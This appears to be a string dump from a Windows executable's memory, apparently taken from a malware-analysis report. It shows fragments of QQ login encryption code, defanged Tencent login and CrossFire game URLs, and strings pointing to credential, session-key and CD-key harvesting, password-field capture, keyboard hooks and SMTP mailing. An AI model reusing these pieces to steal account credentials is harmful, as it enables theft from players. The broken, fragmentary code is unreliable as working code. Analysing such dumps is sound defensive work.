
o.init(W);

for (ae = 0; ae

return o.next()

for (t = 0; t

af.prototype.nextBytes = ax;

z = (z this.S[aD] aE[aD % aE.length]) & 255;

m.prototype.init = f;

m.prototype.next = a;

t.setPublic(aC, z);

return t.encrypt(aD)

return Math.round(Math.random() * 4294967295)

for (var B = 0; B

var C = Number(D[B]).toString(16);

if (C.length == 1) {

for (var A = 0; A

C = String.fromCharCode(parseInt(B.substr(A, 2), 16))

for (var A = 0; A

B[A] = C.charCodeAt(A)

var A = C.length;

var A = E.length;

for (var C = 0; C

var A = u.length;

for (var B = 0; B

C[B] = E.charCodeAt(B) & 255

for (var B = 0; B

C[A ] = parseInt(E.substr(B, 2), 16)

s.TEA = {

for (var B = 0; B

A = String.fromCharCode(C[B])

return d.encode(A)

initkey: function(A, B) {

d.PADCHAR = '=';

d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';

d.getbyte = function(C, B) {

var A = C.charCodeAt(B);

d.encode = function(E) {

if (arguments.length != 1) {

var B = d.PADCHAR;

var G = d.ALPHA;

var F = d.getbyte;

var C = E.length - E.length % 3;

if (E.length == 0) {

A.push(G.charAt(H >> 18));

A.push(G.charAt((H >> 12) & 63));

A.push(G.charAt((H >> 6) & 63));

A.push(G.charAt(H & 63))

switch (E.length - C) {

A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) B B);

A.push(G.charAt(H >> 18) G.charAt((H >> 12) & 63) G.charAt((H >> 6) & 63) B);

return A.join('')

if (!window.btoa) {

window.btoa = d.encode

var hex = str.toString(16);

var len = hex.length;

arr.push('\\x' hex.substr(j, 2))

var result = arr.join('');

hexVcode = s.TEA.strToBytes(c.toUpperCase()),

vcodeLen = '000' c.length.toString(16);

s.TEA.initkey(s2);

var saltPwd = s.TEA.enAsBase64(rsaH1Len rsaH1 s.TEA.strToBytes(salt) vcodeLen hexVcode);

s.TEA.initkey('');

&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=

hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=

function time(){return Math.random()}

hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=

hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=

&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&

pt_mbkey

[SKEY]

"cdkey":"(.*?)"

[%d/d/d d:d]

\CF_CDKEY.ini

hXXp://act.tgp.qq.com/index.php/

Host: act.tgp.qq.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0

Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq

%7C

&user_checkparam=cf%7Cyes%7C

"msg":"

sMsg":"

sMsg":"MODULE OK"

hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=

hXXp://bang.qq.com/actcenter/queryFilterActList

"url":"(.*?)"

hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=

Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf

hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=

hXXp://VVV.baidu.com/

hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5

hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1

hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6

&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1

hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=

&posttime=

hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5

hXXp://bbs.cf.qq.com/forum.php

&searchkey=15051408311873756101000000000000&from=1&question=Ã¥â€¦ÂÃ¨Â´Â¹Ã¦Å¾Âª&vip=0&bangdou=1

%7C322%7C

*&checkparam=cf%7Cyes%7C

&ams_checkparam=cf%7Cyes%7C

&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=

Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf

hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue

hXXp://bangbang.qq.com/php/robott3nologin/servey

Referer:hXXp://bang.qq.com/actcenter/index/cf

hXXp://bang.qq.com/ugc1/getActRecommend

game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01

hXXp://bang.qq.com/user/scorePersonalAcenter

Referer: hXXp://bang.qq.com/main/tradeinfo/

game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=

hXXp://bang.qq.com/user/scorePersonal

hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf

hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f

&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj

hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc

&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc

gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=

Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127

hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=

&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc

gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=

hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc

hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=

hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=

hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=

hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=

hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=

&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub

Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698

hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue

hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=

&_=1454839692917

hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=

msg": "

&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654

hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4

hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86

&_=1452520903377

hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=

hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page

hXXp://buluo.qq.com/cgi-bin/bar/user/sign

hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=

Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign

Host: qiandao.qun.qq.com

hXXp://qiandao.qun.qq.com/cgi-bin/sign

hXXp://qiandao.qun.qq.com/cgi-bin/new_flag

hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=Ã¤Â¸â‚¬Ã¦â€Â¯Ã§Â©Â¿Ã¤Âºâ€˜Ã§Â®Â Ã¥ÂÆ’Ã¥â€ â€ºÃ¤Â¸â€¡Ã©Â©Â¬Ã¦ÂÂ¥Ã§â€ºÂ¸Ã¨Â§ÂÃ£â‚¬â€š

08 08 08 50

hXXp://cfzhushou.com/cfzs/help.html

hXXp://cfzhushou.com/help.html

hXXp://ip.qq.com/cgi-bin/myip

hXXps://aq.qq.com/cn2/safe_service/device_lock

aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=

hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499

&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&

hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js

http2://ossweb

hXXp://ossweb

"img":"http2(.*?).jpg"

"hXXp://(.*?)":{

"~ /1~!

fD.nn'1r?

.KM8'

$&%cw]

hXXp://leesin.zuhaowan.com-

hXXp://leesin.zuhaowan.cn

hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041

hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f

hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h

hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=

1970.01.01 08:00:00

function timea(){var d,s;d=new Date();d.setTime('

hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f

hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=

Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm

hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102

"sMsg":"MODULE OK"

&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue

gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=

hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue

gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=

|322|

*&checkparam=cf|yes|

&ams_checkparam=cf|yes|

sCdKey=

hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1

sMsg" : "

\gzip.dll

`.data

gzip.pdb

_u%SV

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)

hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi

hXXp://cfzhushou.com/pay.html

hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8

&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&

hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-

game.qq.com

hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34

hXXp://cf.qq.com/cfvip/

hXXp://xinyue.qq.com

o%%co

``PBi %c

;ptlogin2

apps.game.qq.com

hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf

nickName":"

?kernel32.dll

{56FDF344-FD6D-11d0-958A-006097C9A090}

{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}

Report

themepassword

SysShadow.HostWnd

{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}

VBScript.RegExp

1970-01-01 00:00:00

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

background(?:-image)?:.*?[\s]*?url[\s]*?\([#

']?(.*?)[#

onkeydown|

onkeyup|

onkeypress|

wA{0002DF05-0000-0000-C000-000000000046}

{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}

{6D5140C1-7436-11CE-8034-00AA006009FA}

text|password|file

?)-D%f`

location.reload()

window.location.href="

{25336920-03F9-11CF-8FD0-00AA00686F13}

hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js

document.all.retjs.innerText=

javascript:document.body.contentEditable='true';document.designMode='on';void 0;

javascript:document.body.contentEditable='false';document.designMode='on';void 0;

javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}

javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};

WarnOnHTTPSToHTTPRedirect

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

type=password

[password]

var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}

user.qzone.qq.com

mail.qq.com

onkeyup

type='password'

type="password"

, 1, , ,

var jie = document.createStyleSheet();jie.addRule('html','

').value="

document.getElementById('

LocationURL

{34A715A0-6587-11D0-924A-0020AFC7AC4D}

SysShadow.Menu

Microsoft.XMLDOM

14:00~16:00

12:00-19:00

1.2.18

%*.*f

MSWHEEL_ROLLMSG

WSOCK32.dll

msscript.ocx

VVV.dywt.com.cn

USER32.DLL

\\.\Smartvsd

\\.\PhysicalDrive%d

\\.\Scsi%d:

HTTP/1.0

%s

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

;3 #>6.&

'2, / 0&7!4-)1#

(*.htm;*.html)|*.htm;*.html

its:%s::%s

(*.avi)|*.avi

WPFT532.CNV

WPFT632.CNV

EXCEL32.CNV

write32.wpc

Windows Write

mswrd632.wpc

Word for Windows 6.0

wword5.cnv

Word for Windows 5.0

mswrd832.cnv

mswrd632.cnv

Word 6.0/95 for Windows & Macintosh

html32.cnv

.PAVCOleException@@

.PAVCOleDispatchException@@

right-curly-bracket

left-curly-bracket

0123456789

c:\%original file name%.exe

GetKeyboardState

InternetCanonicalizeUrlA

.FNNNNNNNNNNNNNNV

.FNNNNNNNNNNNN

.CNNNB

.CNNd

ÃDDDDDDQC

PAD

AVIFIL32.dll

MSVFW32.dll

oledlg.dll

RASAPI32.dll

1.0.15.507

T%Program Files%\NamuADLook.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

VVV.kubei9.com

1.3.6.1

(*.*)

1.0.0.0

6.0.2600.0 (xpclient.010817-1148)

6.0.2600.0

{557CF400-1A04-11D3-9A73-0000F81EF32E}

{557CF401-1A04-11D3-9A73-0000F81EF32E}

{557CF402-1A04-11D3-9A73-0000F81EF32E}

{557CF405-1A04-11D3-9A73-0000F81EF32E}

{557CF406-1A04-11D3-9A73-0000F81EF32E}

2.6.0.0

VVV.cfzhushou.com

%original file name%.exe_3308_rwx_00401000_004DC000: